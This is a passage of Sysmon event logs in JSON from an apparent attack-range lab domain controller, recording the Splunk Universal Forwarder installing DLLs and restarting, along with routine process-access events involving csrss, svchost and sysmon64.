{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2815,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:48:38.181\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nProcessId: 3088\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\vccorlib140.dll\r\nCreationUtcTime: 2020-08-01 05:48:38.181","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:48:38.181","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\vccorlib140.dll","CreationUtcTime":"2020-08-01 05:48:38.181","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2816,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:48:38.181\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nProcessId: 3088\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\vcruntime140.dll\r\nCreationUtcTime: 2020-08-01 05:48:38.181","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:48:38.181","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\vcruntime140.dll","CreationUtcTime":"2020-08-01 05:48:38.181","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2817,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:48:38.181\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nProcessId: 3088\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\wpcap.dll\r\nCreationUtcTime: 2020-08-01 05:48:38.181","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:48:38.181","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\wpcap.dll","CreationUtcTime":"2020-08-01 05:48:38.181","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2818,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.226\r\nProcessGuid: {A837DB8D-0236-5F25-0000-0010FCFB0400}\r\nProcessId: 4920\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: splunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=3088\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.226","ProcessGuid":"{A837DB8D-0236-5F25-0000-0010FCFB0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"splunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=3088","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2819,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.213\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 440\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010FCFB0400}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+77c1aa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+b08def|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+dd792a|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+dd534e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+1a2a848|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.213","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"440","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010FCFB0400}","TargetProcessId":"4920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+77c1aa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+b08def|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+dd792a|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+dd534e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+1a2a848|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2820,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.213\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010FCFB0400}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.213","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010FCFB0400}","TargetProcessId":"4920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2821,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.213\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.213","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2822,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.213\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.213","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2823,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.213\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.213","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2824,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.213\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.213","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2825,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.213\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 